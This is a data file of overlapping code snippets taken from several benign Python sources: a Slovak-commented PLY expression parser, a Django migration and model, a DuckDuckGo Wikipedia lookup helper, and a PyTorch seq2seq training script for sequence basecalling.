"r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<=' t_EQ = '=='",
"True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True # funkcia na zostavenie",
"print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True # funkcia na zostavenie lexemu a",
"yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression) while True: tok =",
"exp2 | ''' def p_x1(p): '''x : NUMBER''' def p_x2(p): '''x : FIELD'''",
"t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<=' t_EQ = '==' t_NEQ",
"| x exp2''' def p_exp2(p): '''exp2 : '+' x exp2 | '-' x",
"pri EOF\") global_var.parseerror = True # funkcia na zostavenie lexemu a parseru #",
"'<' exp | exp GRE exp | exp LOE exp | exp NEQ",
"# definicie tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ',",
"'NEQ', ) # literaly literals = ['+', '-', '*', '/', '>', '<'] #",
"# reset flagu return False if not tok: break # syntakticka kontrola parser.parse(expression)",
"t.lexer.skip(1) # gramatika def p_inp(p): '''inp : exp '>' exp | exp '<'",
"na urcenie chyby def p_error(p): if p: print(\"Syntakticka chyba pri '%s'\" % p.value)",
"= ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly literals",
"kontrola lexemov lexer.input(expression) while True: tok = lexer.token() if global_var.parseerror: # ak chyba",
"% t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika def p_inp(p): '''inp : exp",
"x exp2 | '/' x exp2 | ''' def p_x1(p): '''x : NUMBER'''",
"r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<=' t_EQ = '==' t_NEQ = '!='",
"| exp EQ exp''' def p_exp(p): '''exp : STRING | x exp2''' def",
"\\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value) return t # chybny token def",
"def p_exp2(p): '''exp2 : '+' x exp2 | '-' x exp2 | '*'",
"'==' t_NEQ = '!=' t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+' t.value =",
"p.value) global_var.parseerror = True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True #",
"'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly literals = ['+', '-', '*', '/',",
"EOF\") global_var.parseerror = True # funkcia na zostavenie lexemu a parseru # vstupom",
"x exp2''' def p_exp2(p): '''exp2 : '+' x exp2 | '-' x exp2",
"global_var.parseerror = True t.lexer.skip(1) # gramatika def p_inp(p): '''inp : exp '>' exp",
"global_var.parseerror = True # funkcia na zostavenie lexemu a parseru # vstupom je",
"= True t.lexer.skip(1) # gramatika def p_inp(p): '''inp : exp '>' exp |",
"global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu return False return",
"t_GRE = '>=' t_LOE = '<=' t_EQ = '==' t_NEQ = '!=' t_ignore",
"t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika def p_inp(p): '''inp : exp '>'",
"'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly literals = ['+', '-', '*',",
"EQ exp''' def p_exp(p): '''exp : STRING | x exp2''' def p_exp2(p): '''exp2",
"p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov # ak",
"STRING | x exp2''' def p_exp2(p): '''exp2 : '+' x exp2 | '-'",
"| exp LOE exp | exp NEQ exp | exp EQ exp''' def",
"def t_NUMBER(t): r'\\d+' t.value = int(t.value) return t # chybny token def t_error(t):",
"= '>=' t_LOE = '<=' t_EQ = '==' t_NEQ = '!=' t_ignore =",
"exp | exp EQ exp''' def p_exp(p): '''exp : STRING | x exp2'''",
"True: tok = lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror = False #",
"True def myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru",
"syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror = False # reset",
"= yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression) while True: tok",
"t_NEQ = '!=' t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value)",
"sa chyba, nastavi sa globalna premenna na urcenie chyby def p_error(p): if p:",
"'''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov # ak chyba",
"| '*' x exp2 | '/' x exp2 | ''' def p_x1(p): '''x",
"False # reset flagu return False if not tok: break # syntakticka kontrola",
"'+' x exp2 | '-' x exp2 | '*' x exp2 | '/'",
"lexer = lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola lexemov",
"tok = lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror = False # reset",
"ply.yacc as yacc import global_var # definicie tokenov tokens = ( 'STRING', 'NUMBER',",
"token def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1) #",
"t.value = int(t.value) return t # chybny token def t_error(t): print(\"Nepodporovany znak '%s'\"",
": NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu",
"vrati False, inak True def myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False) #",
"if global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu return False",
"| exp NEQ exp | exp EQ exp''' def p_exp(p): '''exp : STRING",
"print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror = True else: print(\"Syntakticka chyba pri",
"# vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression) while True: tok = lexer.token()",
"fieldu do listu fieldov # ak chyba v gramatike vypise sa chyba, nastavi",
"chyby def p_error(p): if p: print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror =",
"False, inak True def myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False) # vypnutie",
"myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola",
"return False if not tok: break # syntakticka kontrola parser.parse(expression) if global_var.parseerror: #",
"def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika",
"exp | exp NEQ exp | exp EQ exp''' def p_exp(p): '''exp :",
"lexemov lexer.input(expression) while True: tok = lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror",
"debugovacieho suboru # kontrola lexemov lexer.input(expression) while True: tok = lexer.token() if global_var.parseerror:",
"t # chybny token def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror =",
"else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True # funkcia na zostavenie lexemu",
"na zostavenie lexemu a parseru # vstupom je vyraz, pri lexikalnej alebo syntaktickej",
"'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly literals = ['+',",
"= r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<=' t_EQ =",
"global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu return False if",
"lex import ply.yacc as yacc import global_var # definicie tokenov tokens = (",
"while True: tok = lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror = False",
"p_error(p): if p: print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror = True else:",
"global_var.parseerror = True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True # funkcia",
"urcenie chyby def p_error(p): if p: print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror",
"t_EQ = '==' t_NEQ = '!=' t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+'",
"exp EQ exp''' def p_exp(p): '''exp : STRING | x exp2''' def p_exp2(p):",
"| ''' def p_x1(p): '''x : NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1])",
"exp LOE exp | exp NEQ exp | exp EQ exp''' def p_exp(p):",
"flagu return False if not tok: break # syntakticka kontrola parser.parse(expression) if global_var.parseerror:",
"'''exp2 : '+' x exp2 | '-' x exp2 | '*' x exp2",
"literals = ['+', '-', '*', '/', '>', '<'] # popis tokenov t_FIELD =",
"do listu fieldov # ak chyba v gramatike vypise sa chyba, nastavi sa",
"lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression) while",
": '+' x exp2 | '-' x exp2 | '*' x exp2 |",
"t_NUMBER(t): r'\\d+' t.value = int(t.value) return t # chybny token def t_error(t): print(\"Nepodporovany",
"exp | exp GRE exp | exp LOE exp | exp NEQ exp",
"x exp2 | '*' x exp2 | '/' x exp2 | ''' def",
"exp''' def p_exp(p): '''exp : STRING | x exp2''' def p_exp2(p): '''exp2 :",
"t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika def",
"'<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>='",
"pri '%s'\" % p.value) global_var.parseerror = True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror",
"syntaktickej chybe vrati False, inak True def myparse(expression): lexer = lex.lex() parser =",
"= '!=' t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value) return",
": STRING | x exp2''' def p_exp2(p): '''exp2 : '+' x exp2 |",
"lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu return",
"ak chyba global_var.parseerror = False # reset flagu return False if not tok:",
"fieldov # ak chyba v gramatike vypise sa chyba, nastavi sa globalna premenna",
"p_x1(p): '''x : NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu",
"# pridanie fieldu do listu fieldov # ak chyba v gramatike vypise sa",
"exp | exp LOE exp | exp NEQ exp | exp EQ exp'''",
"['+', '-', '*', '/', '>', '<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING",
"p_exp(p): '''exp : STRING | x exp2''' def p_exp2(p): '''exp2 : '+' x",
"import ply.yacc as yacc import global_var # definicie tokenov tokens = ( 'STRING',",
"| '/' x exp2 | ''' def p_x1(p): '''x : NUMBER''' def p_x2(p):",
"not tok: break # syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror",
"# ak chyba global_var.parseerror = False # reset flagu return False return True",
"'>=' t_LOE = '<=' t_EQ = '==' t_NEQ = '!=' t_ignore = \"",
"'>', '<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE =",
"# literaly literals = ['+', '-', '*', '/', '>', '<'] # popis tokenov",
") # literaly literals = ['+', '-', '*', '/', '>', '<'] # popis",
"= ['+', '-', '*', '/', '>', '<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*'",
"nastavi sa globalna premenna na urcenie chyby def p_error(p): if p: print(\"Syntakticka chyba",
"pri lexikalnej alebo syntaktickej chybe vrati False, inak True def myparse(expression): lexer =",
"chyba v gramatike vypise sa chyba, nastavi sa globalna premenna na urcenie chyby",
"% p.value) global_var.parseerror = True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True",
"def p_x1(p): '''x : NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie",
"import global_var # definicie tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE',",
"'LOE', 'EQ', 'NEQ', ) # literaly literals = ['+', '-', '*', '/', '>',",
"exp2 | '-' x exp2 | '*' x exp2 | '/' x exp2",
"exp | exp '<' exp | exp GRE exp | exp LOE exp",
"t_LOE = '<=' t_EQ = '==' t_NEQ = '!=' t_ignore = \" \\t\"",
"gramatika def p_inp(p): '''inp : exp '>' exp | exp '<' exp |",
"return t # chybny token def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror",
"a parseru # vstupom je vyraz, pri lexikalnej alebo syntaktickej chybe vrati False,",
"alebo syntaktickej chybe vrati False, inak True def myparse(expression): lexer = lex.lex() parser",
"def myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru #",
"chybny token def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1)",
"# syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror = False #",
"listu fieldov # ak chyba v gramatike vypise sa chyba, nastavi sa globalna",
"'!=' t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value) return t",
"popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE ="
] |
[
"typing import List from django.db import migrations, models class Migration(migrations.Migration): dependencies: List[str] =",
"= [] operations = [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),",
"[ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)),",
"= [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id',",
"migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key',",
"django.db import migrations, models class Migration(migrations.Migration): dependencies: List[str] = [] operations = [",
"import migrations, models class Migration(migrations.Migration): dependencies: List[str] = [] operations = [ migrations.CreateModel(",
"verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url', models.URLField()), ('method', models.CharField(max_length=10)), ], ),",
"<filename>cloudcix_rest/migrations/0001_initial.py # Generated by Django 2.0.7 on 2018-07-09 13:50 from typing import List",
"from typing import List from django.db import migrations, models class Migration(migrations.Migration): dependencies: List[str]",
"name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)),",
"serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url', models.URLField()), ('method', models.CharField(max_length=10)), ],",
"primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url', models.URLField()), ('method', models.CharField(max_length=10)),",
"13:50 from typing import List from django.db import migrations, models class Migration(migrations.Migration): dependencies:",
"class Migration(migrations.Migration): dependencies: List[str] = [] operations = [ migrations.CreateModel( name='APILog', fields=[ ('id',",
"by Django 2.0.7 on 2018-07-09 13:50 from typing import List from django.db import",
"on 2018-07-09 13:50 from typing import List from django.db import migrations, models class",
"Django 2.0.7 on 2018-07-09 13:50 from typing import List from django.db import migrations,",
"migrations, models class Migration(migrations.Migration): dependencies: List[str] = [] operations = [ migrations.CreateModel( name='APILog',",
"models class Migration(migrations.Migration): dependencies: List[str] = [] operations = [ migrations.CreateModel( name='APILog', fields=[",
"from django.db import migrations, models class Migration(migrations.Migration): dependencies: List[str] = [] operations =",
"# Generated by Django 2.0.7 on 2018-07-09 13:50 from typing import List from",
"models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url', models.URLField()), ('method',",
"('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url', models.URLField()), ('method', models.CharField(max_length=10)), ], ), ]",
"[] operations = [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime',",
"import List from django.db import migrations, models class Migration(migrations.Migration): dependencies: List[str] = []",
"2018-07-09 13:50 from typing import List from django.db import migrations, models class Migration(migrations.Migration):",
"operations = [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)),",
"fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url',",
"dependencies: List[str] = [] operations = [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True,",
"2.0.7 on 2018-07-09 13:50 from typing import List from django.db import migrations, models",
"List[str] = [] operations = [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False,",
"List from django.db import migrations, models class Migration(migrations.Migration): dependencies: List[str] = [] operations",
"Generated by Django 2.0.7 on 2018-07-09 13:50 from typing import List from django.db",
"('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url', models.URLField()),",
"Migration(migrations.Migration): dependencies: List[str] = [] operations = [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True,"
] |
[
"from django.db import models class Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo",
"= models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self): return self.owner +",
"models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self): return self.owner + '/'",
"owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self): return self.owner + '/' +",
"django.db import models class Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo =",
"class Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self):",
"models class Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def",
"repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self): return self.owner",
"<reponame>billryan/github-rss from django.db import models class Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200)",
"= models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self): return self.owner + '/' + self.repo",
"import models class Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200)",
"Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self): return"
] |
[
"return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else None if",
"query def wikipedia_presence(text): \"\"\"Find if a query has wikipedia article\"\"\" return query(text).abstract.url if",
"wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else",
"and query(text).abstract.source == 'Wikipedia' else None if __name__ == '__main__': import sys print",
"import query def wikipedia_presence(text): \"\"\"Find if a query has wikipedia article\"\"\" return query(text).abstract.url",
"query(text).abstract.source == 'Wikipedia' else None if __name__ == '__main__': import sys print wikipedia_presence('",
"from duckduckgo import query def wikipedia_presence(text): \"\"\"Find if a query has wikipedia article\"\"\"",
"wikipedia_presence(text): \"\"\"Find if a query has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract !=",
"query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else None if __name__ == '__main__':",
"a query has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source",
"if a query has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract != None and",
"query has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source ==",
"if query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else None if __name__ ==",
"\"\"\"Find if a query has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract != None",
"has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source == 'Wikipedia'",
"None and query(text).abstract.source == 'Wikipedia' else None if __name__ == '__main__': import sys",
"query(text).abstract.url if query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else None if __name__",
"def wikipedia_presence(text): \"\"\"Find if a query has wikipedia article\"\"\" return query(text).abstract.url if query(text).abstract",
"== 'Wikipedia' else None if __name__ == '__main__': import sys print wikipedia_presence(' '.join(sys.argv[1:]))",
"!= None and query(text).abstract.source == 'Wikipedia' else None if __name__ == '__main__': import",
"article\"\"\" return query(text).abstract.url if query(text).abstract != None and query(text).abstract.source == 'Wikipedia' else None",
"duckduckgo import query def wikipedia_presence(text): \"\"\"Find if a query has wikipedia article\"\"\" return"
] |
[
"validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax =",
"[seq_len, batch, output_dim] # shape of self.hidden: (a, b), where a and b",
"HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio)",
"acc_iteration = [] editd_iteration = [] for iteration, data in enumerate(train_loader): model.train() #Set",
"np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration),",
"f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings set\\n\")",
"both have shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2 =",
"hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size =",
"# Stop looping if we got to the last element in the batch",
"seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd += result num_chars += len(encoded_target) return editd,",
"param in m.named_parameters(): if \"weight\" in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def",
"4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__'))",
"required = True, help=\"File path to the pickle input file.\") parser.add_argument('-o', '--output', required",
"= read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port),",
"true_y_len[not_padded_batches] # remove smallest element = last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches,",
"not in name: for b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\"",
"-1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0,",
"not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train +=",
"if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val +=",
"train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(),",
"following conditions are met: 1. Redistributions of source code must retain the above",
"loss to check if it has decresed, # and if it has, it",
"attention self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim)",
"if updates % make_validation == 0: print(\"=\" * 30) print(\"batch {} in epoch",
"weight_decay = args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip # LSTM hidden = args.hidden_units",
"0.35 and teacher_forcing_ratio >= 0.25: # if we have reached half of the",
"cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\" and \"lstm_decoder\" in name",
"optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,}",
"nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)),",
"import Variable import torch.nn.functional as F import torchvision import pickle import random import",
"Variable(batch_y10, requires_grad=False) # batch_size x out_size x seq_length output, sorted_labels, sorted_labels_len = model(inputs,",
"plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()),",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser # Network # ----------- # * CNN-Encoder",
"labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x out_size x",
"LSTMencoder(nn.Module): #Our batch shape for input x is [batch, seq_len, input_dim] def __init__(self,",
"hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\")",
"plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0,",
"loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0)",
"input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax =",
"0).cuda(self.port) # (batch, 1, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu())",
"input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias =",
"init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if \"weight\" in name and len(list(param.data.size())) >",
"plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf is not",
"items in the sequence won't be shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs,",
"w in self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden): h, c = hidden",
"= data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) #",
"[batch size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder",
"Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from trainings set\") if pdf is not",
"print(start, end) # ingate start, end = 0, n//4 # ordering ingate, forgetgate,",
"loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\")",
"= (seq*batch) # Target nicht one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels =",
"not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train",
"{}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title))",
"loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint",
"= hidden h = h.view(x.size(0), -1) c = c.view(x.size(0), -1) x = x.view(x.size(0),",
"in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd += result num_chars += len(encoded_target) return",
"0: # remove neagtive samples negative_idx = seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx]",
"\"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd =",
